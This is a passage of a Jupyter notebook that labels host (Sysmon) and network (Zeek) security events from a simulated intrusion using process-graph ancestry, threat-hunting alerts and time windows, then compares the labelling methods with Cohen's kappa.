    print_ancestor_descendant_type_graph(H, malicious_root_ancestor, file_nodes, proc_nodes, ip_nodes)
    
    analyze_graph_vs_label_proc(H, proc_nodes)
    
    return H, malicious_root_ancestor, ancestors, descendants, file_nodes, proc_nodes, ip_nodes


## Cluster Manual Recurse Functions

In [15]:
def new_eval_ancestor_chain(G, starting_guid):
    for (p, d) in G.nodes(data=True):
        if 'process_guid' in d['properties'].keys():
            if starting_guid in d['properties']['process_guid']:
                selected_node = p
                
    #ancestors = nx.ancestors(G, selected_node)
    malicious_ancestors = [selected_node]
    print("##########################################")
    print("Conduct Ancestor Chain Evaluation")
    print("##########################################")
    print("")
    for i in list([selected_node] + list(nx.ancestors(G, selected_node))):
        if(G.node[i]['_node_type'] == 'Process'):
            print("==========================================")
            print("Node " + str(i) + " Data:")
            print("==========================================")
            print(G.node[i])
            print("==========================================")
            H, malicious_root_ancestor, ancestors, descendants = get_ancestor_descendant_graph(G, i)
            df = get_graph_dataframe(G)
            
            print("==========================================")
            print("Node " + str(i) + " Ancestor/Descendant Chain:")
            print("==========================================")
            current_node_eval(df, malicious_root_ancestor, ancestors, descendants)
            
            print("==========================================")
            print("Node " + str(i) + " Community Analysis:")
            print("==========================================")
            clusterings = ['Greedy_Mod', 'BestPartition', 'label_prop']
            for j in clusterings:
                print(j)
                get_community_analysis(df, j)
            
            answer = None
            while answer not in ("yes", "no"):
                answer = input("Malicious? Enter yes or no: ")
                if answer == "yes":
                    # Do this.
                    malicious_ancestors.append(i)
                elif answer == "no":
                    # Do that.
                    return malicious_ancestors
                else:
                    print("Please enter yes or no.")
    return malicious_ancestors

def get_ancestor_descendant_graph(G, malicious_root_ancestor):
    print(malicious_root_ancestor)

    descendants = nx.descendants(G, malicious_root_ancestor) #Returns all nodes reachable from source in G.
    print(len(descendants))

    ancestors = nx.ancestors(G, malicious_root_ancestor)
    print(len(ancestors))

    suspected_malicious = list(ancestors) + list(descendants)
    suspected_malicious.append(malicious_root_ancestor)
    print(len(suspected_malicious))

    H = G.subgraph(suspected_malicious)
    return H, malicious_root_ancestor, ancestors, descendants

def get_graph_dataframe(G):
    df = pd.DataFrame.from_dict(dict(G.nodes(data=True)), orient='index')
    df = pd.concat([df.drop(['properties'], axis=1), df['properties'].apply(pd.Series)], axis=1)
    df = df.reset_index().rename(columns={"index" : "NodeID"})
    # Don't know why but the best partition label isn't set in the node attributes..
    #     it's working now. must have been an execution order issue.
    #df['BestPartition'] = df['NodeID'].apply(lambda x: (best_partition[x]))
    return df

def current_node_eval(df, malicious_root_ancestor, ancestors, descendants):
    df['Chain_Loc'] = np.nan
    df['Chain_Loc'].loc[df.NodeID.isin(list(ancestors))] = '1_Ancestor' #[['_display', 'DegreeCentrality']]
    df['Chain_Loc'].loc[df.NodeID.isin([malicious_root_ancestor])] = '2_Root' #[['_display', 'DegreeCentrality']]
    df['Chain_Loc'].loc[df.NodeID.isin(list(descendants))] = '3_Descendant' #[['_display', 'DegreeCentrality']]
    df['Chain_Loc_Int'] = np.nan
    df['Chain_Loc_Int'].loc[df.NodeID.isin([malicious_root_ancestor])] = 0 #[['_display', 'DegreeCentrality']]
    counter = 1
    for i in ancestors:
        df['Chain_Loc_Int'].loc[df['NodeID'] == i] = counter #[['_display', 'DegreeCentrality']]
        counter += 1
    columnList = ['_display', '_node_type', 'Chain_Loc', 'Chain_Loc_Int', 'BestPartition', 'Greedy_Mod', 'label_prop', 'betweenness', 'DegreeCentrality', 'ClusterCoef', 'AveNeighDegree']
    display(df.loc[(((df['Chain_Loc']=='1_Ancestor') & (df['_node_type']=='Process'))| (df['Chain_Loc']=='2_Root') | ((df['Chain_Loc']=='3_Descendant') & (df['_node_type']=='Process')))].sort_values(by=['Chain_Loc_Int'], ascending=True)[columnList])
    
def get_community_analysis(df, clustering):
    df['Chain_Loc'] = df.Chain_Loc.fillna(False)
    #df.groupby('Chain_Loc', 'Greedy_Mod').count()
    Greedy_Mod_In = dict(df.loc[df.Chain_Loc!=False][clustering].value_counts())
    Greedy_Mod_Out = dict(df.loc[df.Chain_Loc==False][clustering].value_counts())
    Greedy_Mod_All = dict(df[clustering].value_counts())

    Greedy_Mod_In_Proc = dict(df.loc[(df.Chain_Loc!=False) & (df._node_type=='Process')][clustering].value_counts())
    Greedy_Mod_In_Proc

    Greedy_Mod_Out_Proc = dict(df.loc[(df.Chain_Loc==False) & (df._node_type=='Process')][clustering].value_counts())
    Greedy_Mod_All_Proc = dict(df.loc[(df._node_type=='Process')][clustering].value_counts())

    combo_dict = {}
    for i, j in Greedy_Mod_In.items():
        combo_dict[i] = {
            'in_all' : j,
            'out_all' : 0,
            'all_all' : Greedy_Mod_All[i],
            'in_proc' : 0,
            'out_proc' : 0,
            'all_proc' : 0,
        }
        if i in Greedy_Mod_Out:
            combo_dict[i]['out_all'] = Greedy_Mod_Out[i]
        combo_dict[i]['All_Type_Percent_Malicious'] = (combo_dict[i]['in_all'] / combo_dict[i]['all_all'])

        if i in Greedy_Mod_Out_Proc:
            combo_dict[i]['out_proc'] = Greedy_Mod_Out_Proc[i]

        if i in Greedy_Mod_In_Proc:
            combo_dict[i]['in_proc'] = Greedy_Mod_In_Proc[i]

        if i in Greedy_Mod_All_Proc:
            combo_dict[i]['all_proc'] = Greedy_Mod_All_Proc[i]
            combo_dict[i]['Proc_Type_Percent_Malicious'] = (combo_dict[i]['in_proc'] / combo_dict[i]['all_proc'])

    display(pd.DataFrame(combo_dict).transpose().sort_values('Proc_Type_Percent_Malicious', ascending=False))

## Beagle Graph Construction

In [16]:
from beagle.backends import NetworkX
from beagle.transformers import SysmonTransformer

import os
import json
from typing import Dict, Generator, List

from beagle.datasources.base_datasource import DataSource
from beagle.transformers import GenericTransformer
from beagle.transformers.sysmon_transformer import SysmonTransformer

class JSONData(DataSource):
    """A generic data source which returns events one by one
    """

    name = "JSON Data"
    transformers = [SysmonTransformer]
    category = "Generic Data"

    def __init__(self, events: List[Dict]) -> None:
        self._events = events

    def events(self) -> Generator[dict, None, None]:
        for event in self._events:
            yield event

    def metadata(self) -> dict:
        return {}
    
# 4688 events just throw things off with no added information.
NX = NetworkX.from_datasources(
    datasources=[
#        WinJSONData(df_label.loc[(df_label['EventID']==4688)].to_dict('records')),
        JSONData(df_label.loc[(df_label['EventID']==1)].to_dict('records')),
        JSONData(df_label.loc[(df_label['EventID']==3)].to_dict('records')),
        JSONData(df_label.loc[(df_label['EventID']==11)].to_dict('records')),
#        JSONData(df_label.loc[(df_label['EventID']==13)].to_dict('records')),
#        JSONData(df_label.loc[(df_label['EventID']==14)].head(100).to_dict('records')),

    ]
)
G = NX.graph()
#G
graph_json = NetworkX.graph_to_json(G)

from networkx.readwrite import json_graph
G = json_graph.node_link_graph(graph_json)
G = nx.convert_node_labels_to_integers(G, first_label=0, ordering='default', label_attribute='Orig_Node_ID')

2020-08-16T17:39:34 | beagle.transformers.sysmon_transformer.__init__:15 | INFO | Created Sysmon Transformer.
2020-08-16T17:39:34 | beagle.transformers.base_transformer._consumer_thread:143 | WARNING | Error when parsing event, recieved exception 'float' object has no attribute 'split'
2020-08-16T17:39:34 | beagle.transformers.base_transformer._consumer_thread:143 | WARNING | Error when parsing event, recieved exception 'float' object has no attribute 'split'
2020-08-16T17:39:34 | beagle.transformers.base_transformer._consumer_thread:143 | WARNING | Error when parsing event, recieved exception 'float' object has no attribute 'split'
2020-08-16T17:39:34 | beagle.transformers.base_transformer._consumer_thread:143 | WARNING | Error when parsing event, recieved exception 'float' object has no attribute 'split'
2020-08-16T17:39:34 | beagle.transformers.base_transformer.run:111 | INFO | Finished processing of events, created 1784 nodes.
2020-08-16T17:39:34 | beagle.transformers.base_transfor

In [17]:
df = get_graph_dataframe(G)
df.head(1)

,NodeID,_node_type,_node_class,_display,_color,Orig_Node_ID,process_guid,host,process_id,user,process_image,process_image_path,command_line,hashes,process_path,file_path,file_name,full_path,extension,ip_address,mac
0,0,Process,SysMonProc,svchost.exe,#FF0000,7928146932027594960,{47ab858c-cadc-5eac-2200-000000000400},SCRANTON.dmevals.local,1448.0,None,svchost.exe,C:\Windows\System32,None,{},C:\Windows\System32\svchost.exe,NaN,NaN,NaN,NaN,NaN,NaN


# Graph Labelling Approach

In [18]:
def get_selected_node(G, starting_guid):
    for (p, d) in G.nodes(data=True):
        if 'process_guid' in d['properties'].keys():
            if starting_guid in d['properties']['process_guid']:
                selected_node = p
    return selected_node

def graph_label_pipeline(G, starting_point):
    malicious_root_ancestor = get_selected_node(G, starting_point)
    print(malicious_root_ancestor)
    
    H, malicious_root_ancestor, ancestors, descendants = get_ancestor_descendant_graph(G, malicious_root_ancestor)
    
    #print_ancestor_descendant_graph(H, malicious_root_ancestor, ancestors, descendants)
    
    #file_nodes, proc_nodes, ip_nodes = get_ancestor_descendant_types(H)
    
    #print_ancestor_descendant_type_graph(H, malicious_root_ancestor, file_nodes, proc_nodes, ip_nodes)
    
    #analyze_graph_vs_label_proc(H, proc_nodes)
    
    return H, malicious_root_ancestor, ancestors, descendants

In [19]:
# Get Scranton Initial Compromise Descendants
H, malicious_root_ancestor, ancestors, descendants = graph_label_pipeline(G, '{47ab858c-e13c-5eac-a903-000000000400}')

1365
1365
489
4
494


In [20]:
descendants.add(malicious_root_ancestor)
df_bad_proc = df.loc[(df.NodeID.isin(descendants)) & (df['_node_type']=='Process')]
df_bad_proc.shape

(34, 21)

In [21]:
H, malicious_root_ancestor, ancestors, descendants = graph_label_pipeline(G, '{5aa8ec29-e5b7-5eac-7603-000000000400}')

156
156
39
3
43


In [22]:
descendants.add(malicious_root_ancestor)
df_bad_proc = df_bad_proc.append(df.loc[(df.NodeID.isin(descendants)) & (df['_node_type']=='Process')])
df_bad_proc.shape

(44, 21)

In [23]:
H, malicious_root_ancestor, ancestors, descendants = graph_label_pipeline(G, '{47ab858c-e6b2-5eac-4d00-000000000500}')

141
141
3
12
16


In [24]:
descendants.add(malicious_root_ancestor)
df_bad_proc = df_bad_proc.append(df.loc[(df.NodeID.isin(descendants)) & (df['_node_type']=='Process')])
df_bad_proc.shape

(46, 21)

## Apply the Graph Bad Processes GUIDs as Label

In [25]:
graph_bad_procs = df_bad_proc['process_guid'].unique()

In [26]:
df_label['TP_Binary'].value_counts()

False    195322
True       3438
Name: TP_Binary, dtype: int64

In [27]:
df_label['G1_Binary'] = False
df_label['G1_Binary'].loc[(df_label.ProcessGuid.isin(graph_bad_procs))] = True

/home/jake/miniconda3/envs/py3msc/lib/python3.7/site-packages/pandas/core/indexing.py:671: SettingWithCopyWarning: 
A value is trying to be set on a copy of a slice from a DataFrame

See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy
  self._setitem_with_indexer(indexer, value)


In [28]:
df_label['G1_Binary'].value_counts()

False    176801
True      24099
Name: G1_Binary, dtype: int64

## Apply the Graph Bad Process IDs + Hostnames as Label

In [29]:
for namedTuple in df_bad_proc.itertuples():
    df_label['G1_Binary'].loc[(df_label['Hostname'] == namedTuple.host) & 
                              (df_label['ProcessID_Int'] == namedTuple.process_id)
                             ] = True

In [30]:
# Success!?
df_label['G1_Binary'].value_counts()

False    166367
True      34533
Name: G1_Binary, dtype: int64

## Expand the Graph Label to the Zeek Data

In [31]:
df_label[(df_label.G1_Binary==True) & (df_label.Source_IP.notnull()) & (df_label.Destination_IP.notnull())].groupby(['G1_Binary', 'Source_IP', 'Destination_IP', 'Destination_Port'])['time_stamp', 'EventID', 'TP_Binary', 'Source_IP', 'Destination_IP', 'Destination_Port'].count()

/home/jake/miniconda3/envs/py3msc/lib/python3.7/site-packages/ipykernel_launcher.py:1: FutureWarning: Indexing with multiple keys (implicitly converted to a tuple of keys) will be deprecated, use a list instead.
  """Entry point for launching an IPython kernel.


time_stamp  EventID  \
G1_Binary Source_IP Destination_IP Destination_Port                        
True      10.0.1.4  10.0.0.4       389.0                      4        4   
                    10.0.1.6       135.0                     10       10   
                                   5985.0                     8        8   
                                   59208.0                    8        8   
                    168.61.186.235 443.0                     14       14   
                    192.168.0.4    80.0                       2        2   
                                   443.0                     12       12   
                    192.168.0.5    443.0                      4        4   
                                   1234.0                     2        2   
                    23.4.15.75     443.0                      8        8   
                    72.21.81.200   443.0                      4        4   
          10.0.1.6  192.168.0.4    8443.0                   696      696   

                                                     TP_Binary  Source_IP  \
G1_Binary Source_IP Destination_IP Destination_Port                         
True      10.0.1.4  10.0.0.4       389.0                     4          4   
                    10.0.1.6       135.0                    10         10   
                                   5985.0                    8          8   
                                   59208.0                   8          8   
                    168.61.186.235 443.0                    14         14   
                    192.168.0.4    80.0                      2          2   
                                   443.0                    12         12   
                    192.168.0.5    443.0                     4          4   
                                   1234.0                    2          2   
                    23.4.15.75     443.0                     8          8   
                    72.21.81.200   443.0                     4          4   
          10.0.1.6  192.168.0.4    8443.0                  696        696   

                                                     Destination_IP  \
G1_Binary Source_IP Destination_IP Destination_Port                   
True      10.0.1.4  10.0.0.4       389.0                          4   
                    10.0.1.6       135.0                         10   
                                   5985.0                         8   
                                   59208.0                        8   
                    168.61.186.235 443.0                         14   
                    192.168.0.4    80.0                           2   
                                   443.0                         12   
                    192.168.0.5    443.0                          4   
                                   1234.0                         2   
                    23.4.15.75     443.0                          8   
                    72.21.81.200   443.0                          4   
          10.0.1.6  192.168.0.4    8443.0                       696   

                                                     Destination_Port  
G1_Binary Source_IP Destination_IP Destination_Port                    
True      10.0.1.4  10.0.0.4       389.0                            4  
                    10.0.1.6       135.0                           10  
                                   5985.0                           8  
                                   59208.0                          8  
                    168.61.186.235 443.0                           14  
                    192.168.0.4    80.0                             2  
                                   443.0                           12  
                    192.168.0.5    443.0                            4  
                                   1234.0                           2  
                    23.4.15.75     443.0                            8  
                    72.21.81.200   443.0          

In [32]:
bad_flows = df_label[(df_label.G1_Binary==True) & (df_label.Source_IP.notnull()) & (df_label.Destination_IP.notnull())].groupby(['G1_Binary', 'Source_IP', 'Destination_IP', 'Destination_Port'])['time_stamp', 'EventID', 'TP_Binary', 'Source_IP', 'Destination_IP', 'Destination_Port'].count()

/home/jake/miniconda3/envs/py3msc/lib/python3.7/site-packages/ipykernel_launcher.py:1: FutureWarning: Indexing with multiple keys (implicitly converted to a tuple of keys) will be deprecated, use a list instead.
  """Entry point for launching an IPython kernel.


In [33]:
df_label.G1_Binary.value_counts()

False    166367
True      34533
Name: G1_Binary, dtype: int64

In [34]:
for namedTuple in bad_flows.itertuples():
    df_label['G1_Binary'].loc[(df_label.id_orig_h == namedTuple.Index[1]) &
                             (df_label.id_resp_h == namedTuple.Index[2]) &
                             (df_label.id_resp_p == namedTuple.Index[3])] = namedTuple.Index[0]

/home/jake/miniconda3/envs/py3msc/lib/python3.7/site-packages/pandas/core/indexing.py:671: SettingWithCopyWarning: 
A value is trying to be set on a copy of a slice from a DataFrame

See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy
  self._setitem_with_indexer(indexer, value)


In [35]:
df_label.G1_Binary.value_counts()

False    165500
True      35400
Name: G1_Binary, dtype: int64

# Threat Hunting Expanded Approach

## TP_Binary to Zeek Data

In [36]:
df_label.TP_Binary.value_counts()

False    195322
True       3438
Name: TP_Binary, dtype: int64

In [37]:
df_label[(df_label.TP_Binary==True) & (df_label.Source_IP.notnull()) & (df_label.Destination_IP.notnull())].groupby(['TP_Label', 'Source_IP', 'Destination_IP', 'Destination_Port'])['time_stamp', 'EventID', 'TP_Binary', 'Source_IP', 'Destination_IP', 'Destination_Port'].count()

/home/jake/miniconda3/envs/py3msc/lib/python3.7/site-packages/ipykernel_launcher.py:1: FutureWarning: Indexing with multiple keys (implicitly converted to a tuple of keys) will be deprecated, use a list instead.
  """Entry point for launching an IPython kernel.


,,,,time_stamp,EventID,TP_Binary,Source_IP,Destination_IP,Destination_Port
TP_Label,Source_IP,Destination_IP,Destination_Port,,,,,,
"0, 1.A.3. Uncommonly Used Port",10.0.1.4,192.168.0.5,1234.0,2,2,2,2,2,2
"0, 3.B.3. Commonly Used Port",10.0.1.4,192.168.0.5,443.0,4,4,4,4,4,4
"0, 8.A.1. Remote System Discovery",10.0.1.4,10.0.0.4,389.0,4,4,4,4,4,4
"0, 8.A.2. Remote System Discovery",10.0.1.4,10.0.1.6,5985.0,8,8,8,8,8,8


In [38]:
bad_flows = df_label[(df_label.TP_Binary==True) & (df_label.Source_IP.notnull()) & (df_label.Destination_IP.notnull())].groupby(['TP_Label', 'Source_IP', 'Destination_IP', 'Destination_Port'])['time_stamp', 'EventID', 'TP_Binary', 'Source_IP', 'Destination_IP', 'Destination_Port'].count()

/home/jake/miniconda3/envs/py3msc/lib/python3.7/site-packages/ipykernel_launcher.py:1: FutureWarning: Indexing with multiple keys (implicitly converted to a tuple of keys) will be deprecated, use a list instead.
  """Entry point for launching an IPython kernel.


In [39]:
for namedTuple in bad_flows.itertuples():
    df_label['TP_Label'].loc[(df_label.id_orig_h == namedTuple.Index[1]) &
                             (df_label.id_resp_h == namedTuple.Index[2]) &
                             (df_label.id_resp_p == namedTuple.Index[3])] = namedTuple.Index[0]
    print(df_label['TP_Label'].count())

/home/jake/miniconda3/envs/py3msc/lib/python3.7/site-packages/pandas/core/indexing.py:671: SettingWithCopyWarning: 
A value is trying to be set on a copy of a slice from a DataFrame

See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy
  self._setitem_with_indexer(indexer, value)


198761
198766
198778
198786


In [40]:
df_label['TP_Label'] = df_label.TP_Label.fillna('0')

In [41]:
df_label['TP_Binary'] = df_label.TP_Label!='0'

In [42]:
# Check the host data TP_Binary distribution
df_label['TP_Binary'].loc[df_label.EventID.notna()].value_counts()

False    195322
True       3438
Name: TP_Binary, dtype: int64

In [43]:
# Check the network data TP_Binary distribution
df_label['TP_Binary'].loc[df_label['@system'].notna()].value_counts()

False    2114
True       26
Name: TP_Binary, dtype: int64

## Expand TP_Binary Bad Processes to Matching Events

In [44]:
df_label['THE_Binary'] = df_label['TP_Binary']

In [45]:
bad_processes = df_label[(df_label.TP_Binary==True) & (df_label.ProcessGuid.notna())]['ProcessGuid'].unique()

In [46]:
df_label['THE_Binary'].value_counts()

False    197436
True       3464
Name: THE_Binary, dtype: int64

In [47]:
df_label['THE_Binary'].loc[(df_label.THE_Binary == False) & (df_label.ProcessGuid.isin(bad_processes))] = True

In [48]:
df_label['THE_Binary'].value_counts()

False    174628
True      26272
Name: THE_Binary, dtype: int64

In [49]:
bad_processes = df_label[(df_label.TP_Binary==True) & (df_label.ProcessGuid.notna())][['ProcessID_Int', 'Hostname']].drop_duplicates()

In [50]:
for namedTuple in bad_processes.itertuples():
#    print(namedTuple.Hostname)
#    print(namedTuple.ProcessID_Int)
    df_label['THE_Binary'].loc[(df_label['Hostname'] == namedTuple.Hostname) & 
                              (df_label['ProcessID_Int'] == namedTuple.ProcessID_Int)
                             ] = True

In [51]:
df_label['THE_Binary'].value_counts()

False    164693
True      36207
Name: THE_Binary, dtype: int64

In [52]:
with pd.option_context('display.max_rows', None, 'display.max_columns', None, 'display.max_colwidth', None):
    display(df_label.loc[df_label.EventID.notna()][['EventID', 'ProcessGuid', 'ProcessId', 'SourceProcessId', 'TargetProcessId', 'SourceProcessGuid', 'TargetProcessGuid', 'Hostname', '@timestamp']].groupby('EventID').count().sort_values(by=['@timestamp'], ascending=False))

,ProcessGuid,ProcessId,SourceProcessId,TargetProcessId,SourceProcessGuid,TargetProcessGuid,Hostname,@timestamp
EventID,,,,,,,,
12.0,61157,61157,0,0,0,0,61158,61158
10.0,0,39283,39283,39283,0,0,39286,39286
7.0,20259,20259,0,0,0,0,20259,20259
13.0,17541,17541,0,0,0,0,17542,17542
4658.0,0,10973,0,0,0,0,10973,10973
4103.0,0,0,0,0,0,0,7750,7750
4656.0,0,5497,0,0,0,0,5497,5497
4690.0,0,5471,5471,5471,0,0,5471,5471
4663.0,0,5337,0,0,0,0,5337,5337


# Apply Time Window Broad Label - TWB_Binary
------------------

## Apply Time Window Broad to Host Events

In [53]:
# Only Showing Host data for Hostname hits.
#    -> Need Common Hostname or System or Source_IP or something
#        -> landed on uid for network data
df_label.loc[df_label.TP_Binary == True].sort_values('time_stamp').groupby(['TP_Binary', 'Hostname'])['time_stamp'].agg(['first','last', 'count'])

first  \
TP_Binary Hostname                                                  
True      NASHUA.dmevals.local   2020-05-02 03:09:29.929000+00:00   
          NEWYORK.dmevals.local  2020-05-02 03:04:05.749000+00:00   
          SCRANTON.dmevals.local 2020-05-02 02:55:57.730000+00:00   

                                                             last  count  
TP_Binary Hostname                                                        
True      NASHUA.dmevals.local   2020-05-02 03:17:53.817000+00:00     44  
          NEWYORK.dmevals.local  2020-05-02 03:04:05.749000+00:00      1  
          SCRANTON.dmevals.local 2020-05-02 03:19:53.189000+00:00   3393

In [54]:
bad_broad_timewindows = df_label.loc[df_label.TP_Binary == True].sort_values('time_stamp').groupby(['TP_Binary', 'Hostname'])['time_stamp'].agg(['first','last', 'count'])

In [55]:
df_label['TWB_Binary'] = False

In [56]:
df_label['TWB_Binary'].value_counts()

False    200900
Name: TWB_Binary, dtype: int64

In [57]:
for namedTuple in bad_broad_timewindows.itertuples():
    df_label['TWB_Binary'].loc[(df_label['time_stamp'] >= namedTuple.first) & 
                               (df_label['time_stamp'] <= namedTuple.last) &
                               (df_label['Hostname'] == namedTuple.Index[1])
                              ] = True
    print(df_label['TWB_Binary'].value_counts())

False    189842
True      11058
Name: TWB_Binary, dtype: int64
False    189837
True      11063
Name: TWB_Binary, dtype: int64
False    111336
True      89564
Name: TWB_Binary, dtype: int64


/home/jake/miniconda3/envs/py3msc/lib/python3.7/site-packages/pandas/core/indexing.py:671: SettingWithCopyWarning: 
A value is trying to be set on a copy of a slice from a DataFrame

See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy
  self._setitem_with_indexer(indexer, value)


## Apply Time Window Broad to Network Events

In [58]:
# Get First and Last Timestamps for network data.
df_label.loc[(df_label['id_orig_h'].notna())].sort_values('time_stamp').groupby(['TP_Binary', 'Source_IP', 'Destination_IP'])['time_stamp'].agg(['first','last', 'count'])

first  \
TP_Binary Source_IP Destination_IP                                       
False     10.0.1.4  10.0.0.4       2020-04-30 00:06:38.899709940+00:00   
                    10.0.1.255     2020-04-30 00:09:01.189415932+00:00   
                    10.0.1.6       2020-04-30 00:35:25.606390953+00:00   
                    192.168.0.4    2020-04-30 00:32:14.891381979+00:00   
          10.0.1.6  10.0.0.4       2020-04-30 00:06:39.824369907+00:00   
                    10.0.1.255     2020-04-30 00:08:43.385543108+00:00   
                    192.168.0.4    2020-04-30 00:40:44.730953932+00:00   
True      10.0.1.4  10.0.0.4       2020-04-30 00:12:00.847908020+00:00   
                    10.0.1.6       2020-04-30 00:33:26.283442020+00:00   
                    192.168.0.5    2020-04-30 00:08:02.361653090+00:00   

                                                                  last  count  
TP_Binary Source_IP Destination_IP                                             
False     10.0.1.4  10.0.0.4       2020-04-30 00:43:58.389343023+00:00    179  
                    10.0.1.255     2020-04-30 00:45:00.760719061+00:00      8  
                    10.0.1.6       2020-04-30 00:45:00.056051970+00:00    104  
                    192.168.0.4    2020-04-30 00:35:25.658109903+00:00     78  
          10.0.1.6  10.0.0.4       2020-04-30 00:43:59.015400887+00:00    148  
                    10.0.1.255     2020-04-30 00:44:42.662991047+00:00      8  
                    192.168.0.4    2020-04-30 00:44:44.752271891+00:00    753  
True      10.0.1.4  10.0.0.4       2020-04-30 00:35:04.410170078+00:00     12  
                    10.0.1.6       2020-04-30 00:33:29.289120913+00:00      8  
                    192.168.0.5    2020-04-30 00:15:18.751499891+00:00      6

In [59]:
bad_broad_netflows = df_label.loc[((df_label['id_orig_h'].notna()) & df_label.TP_Binary == True)].sort_values('time_stamp').groupby(['TP_Binary', 'Source_IP', 'Destination_IP'])['time_stamp'].agg(['first','last', 'count'])

In [60]:
bad_broad_netflows

first  \
TP_Binary Source_IP Destination_IP                                       
True      10.0.1.4  10.0.0.4       2020-04-30 00:12:00.847908020+00:00   
                    10.0.1.6       2020-04-30 00:33:26.283442020+00:00   
                    192.168.0.5    2020-04-30 00:08:02.361653090+00:00   

                                                                  last  count  
TP_Binary Source_IP Destination_IP                                             
True      10.0.1.4  10.0.0.4       2020-04-30 00:35:04.410170078+00:00     12  
                    10.0.1.6       2020-04-30 00:33:29.289120913+00:00      8  
                    192.168.0.5    2020-04-30 00:15:18.751499891+00:00      6

In [61]:
df_label['TWB_Binary'].value_counts()

False    111336
True      89564
Name: TWB_Binary, dtype: int64

In [62]:
for namedTuple in bad_broad_netflows.itertuples():
    df_label['TWB_Binary'].loc[(df_label['time_stamp'] >= namedTuple.first) & 
                           (df_label['time_stamp'] <= namedTuple.last) &
                           ((df_label['Source_IP'] == namedTuple.Index[1]) & (df_label['Destination_IP'] == namedTuple.Index[2]) |
                            (df_label['Source_IP'] == namedTuple.Index[2]) & (df_label['Destination_IP'] == namedTuple.Index[1]))
                          ] = True
    print(df_label['TWB_Binary'].value_counts())

/home/jake/miniconda3/envs/py3msc/lib/python3.7/site-packages/pandas/core/indexing.py:671: SettingWithCopyWarning: 
A value is trying to be set on a copy of a slice from a DataFrame

See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy
  self._setitem_with_indexer(indexer, value)


False    111186
True      89714
Name: TWB_Binary, dtype: int64
False    111178
True      89722
Name: TWB_Binary, dtype: int64
False    111172
True      89728
Name: TWB_Binary, dtype: int64


# Apply Time Window Micro Label - TWM_Binary
------------------

## Time Window Micro -> TP_Binary

In [63]:
df_label['time_stamp_seconds'] = df_label['time_stamp'].apply(lambda x: (pd.to_datetime(x, unit='s', utc=True).ctime()))

In [64]:
bad_seconds = df_label[df_label.TP_Binary==True][['time_stamp_seconds', 'Hostname', 'uid']].drop_duplicates()

In [65]:
df_label.shape

(200900, 563)

In [66]:
df_label['TWM_Binary'] = False

In [67]:
df_label.shape

(200900, 564)

In [68]:
df_label['TWM_Binary'].value_counts()

False    200900
Name: TWM_Binary, dtype: int64

In [69]:
for namedTuple in bad_seconds.itertuples(index=False):
    df_label['TWM_Binary'].loc[(df_label.time_stamp_seconds == namedTuple.time_stamp_seconds) &
                               ((df_label.Hostname == namedTuple.Hostname) |
                               (df_label.uid == namedTuple.uid))
                              ] = True

In [70]:
df_label['TP_Binary'].value_counts()

False    197436
True       3464
Name: TP_Binary, dtype: int64

In [71]:
df_label['TWM_Binary'].value_counts()

False    181496
True      19404
Name: TWM_Binary, dtype: int64

## Time Window Micro -> THE_Binary

In [72]:
bad_seconds = df_label[df_label.THE_Binary==True][['time_stamp_seconds', 'Hostname', 'uid']].drop_duplicates()

In [73]:
df_label['TWM_THE_Binary'] = False
for namedTuple in bad_seconds.itertuples(index=False):
    df_label['TWM_THE_Binary'].loc[(df_label.time_stamp_seconds == namedTuple.time_stamp_seconds) &
                               ((df_label.Hostname == namedTuple.Hostname) |
                               (df_label.uid == namedTuple.uid))
                              ] = True

In [74]:
df_label['THE_Binary'].value_counts()

False    164693
True      36207
Name: THE_Binary, dtype: int64

In [75]:
df_label['TWM_THE_Binary'].value_counts()

False    128243
True      72657
Name: TWM_THE_Binary, dtype: int64

## Time Window Micro -> G1_Binary

In [76]:
bad_seconds = df_label[df_label.G1_Binary==True][['time_stamp_seconds', 'Hostname', 'uid']].drop_duplicates()
df_label['TWM_G1_Binary'] = False
for namedTuple in bad_seconds.itertuples(index=False):
    df_label['TWM_G1_Binary'].loc[(df_label.time_stamp_seconds == namedTuple.time_stamp_seconds) &
                               ((df_label.Hostname == namedTuple.Hostname) |
                               (df_label.uid == namedTuple.uid))
                              ] = True

In [77]:
df_label['G1_Binary'].value_counts()

False    165500
True      35400
Name: G1_Binary, dtype: int64

In [78]:
df_label['TWM_G1_Binary'].value_counts()

False    116474
True      84426
Name: TWM_G1_Binary, dtype: int64

# Evaluations

## Label vs Label

In [79]:
from sklearn.metrics import cohen_kappa_score

#cohen_kappa_score(y_true, y_pred)

In [80]:
# Threat Hunting Expanded Label vs Threat Hunting (Signature)
cohen_kappa_score(df_label['THE_Binary'], df_label['TP_Binary'])

0.14781499785488694

In [81]:
# Threat Hunting Expanded Label vs Time Window Broad Label
cohen_kappa_score(df_label['THE_Binary'], df_label['TWB_Binary'])

0.42274358407803847

In [82]:
# Threat Hunting Expanded Label vs Time Window Micro (Based on TP_Binary) Label
cohen_kappa_score(df_label['THE_Binary'], df_label['TWM_Binary'])

0.257397648340015

In [83]:
# Threat Hunting Expanded Label vs Time Window Micro (Based on THE_Binary) Label
cohen_kappa_score(df_label['THE_Binary'], df_label['TWM_THE_Binary'])

0.5591166555822825

In [84]:
# Threat Hunting Expanded Label vs Time Window Micro (Based on G1_Binary) Label
cohen_kappa_score(df_label['THE_Binary'], df_label['TWM_G1_Binary'])

0.4529932896888347

In [85]:
# Threat Hunting Expanded Label vs Graph Based Label
cohen_kappa_score(df_label['THE_Binary'], df_label['G1_Binary'])

0.8771563098485655

In [86]:
from sklearn.metrics import cohen_kappa_score
from sklearn.metrics import accuracy_score
from sklearn.metrics import f1_score

d = {'Label': ['Threat Hunting Label', 'Alert Label', 'Time Window Broad', 'Time Window Micro', 'Graph Label'],
     'fraction_malicious': [(len(df_label.loc[df_label['THE_Binary']==True])/(len(df_label))),
                            (len(df_label.loc[df_label['TP_Binary']==True])/(len(df_label))),
                            (len(df_label.loc[df_label['TWB_Binary']==True])/(len(df_label))),
                            (len(df_label.loc[df_label['TWM_Binary']==True])/(len(df_label))),
                            (len(df_label.loc[df_label['G1_Binary']==True])/(len(df_label))),
                           ],
